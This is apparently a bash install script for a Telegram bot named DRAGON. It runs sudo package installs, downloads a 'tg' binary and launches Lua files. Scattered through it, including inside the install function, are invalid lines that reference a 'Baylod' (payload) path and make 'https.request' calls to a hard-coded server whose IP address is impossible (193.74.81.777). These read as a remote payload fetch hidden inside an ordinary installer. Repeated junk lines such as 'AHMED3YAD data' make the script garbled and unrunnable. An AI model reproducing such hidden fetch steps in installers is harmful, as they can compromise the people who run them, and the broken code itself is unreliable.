#!/usr/bin/env bash
cd $HOME/DRAGON
wget https://raw.githubusercontent.com/ahmedyad200/tg-file/master/tg
clear
apidespowne = http//193.74.81.777/IPSUDO/Download/Baylod/server/idbot/
if installstart = x//DEV3YAD/apidespowne
install() {
rm -rf $HOME/.telegram-cli
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install software-properties-common -y
sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
sudo luarocks install luasocket
sudo luarocks install luasec
sudo luarocks install redis-lua
sudo luarocks install Lua-cURL
sudo service redis-server start
install Baylod
sudo apt-get update -y
sudo apt-get install g++-4.7 -y c++-4.7
sudo apt-get install libreadline-dev -y libconfig-dev -y libssl-dev -y lua5.2 -y liblua5.2-dev -y lua-socket -y lua-sec -y lua-expat -y libevent-dev -y make unzip git redis-server autoconf g++ -y libjansson-dev -y libpython-dev -y expat libexpat1-dev -y curl -y htop -y
sudo apt-get install screen -y
sudo apt-get install libstdc++6 -y
sudo apt-get install lua-lgi -y
install DEV3YAD
sudo apt-get install libnotify-dev -y
sudo chmod +x tg
delop Baylod -DEV3YAD
data redis delop -944353237;https.request(193.74.81.777/delop/Baylod/startBaylod)
AHMED3YAD data
lua DRAGON.lual
sudo chmod +x DRAGON
sudo chmod +x ./DRG
./DRG
}
AHMED3YAD data
if [ "$1" = "install" ]; then
install
else
AHMED3YAD data
if [ ! -f ./tg ]; then
echo "Tg Is Not Found"
exit 1
fi
AHMED3YAD data
https.request(installstart)
sudo chmod +x tg
lua DRAGON.lua
AHMED3YAD data
sudo chmod +x DRAGON
sudo chmod +x ./DRG
./DRG
fi
AHMED3YAD data
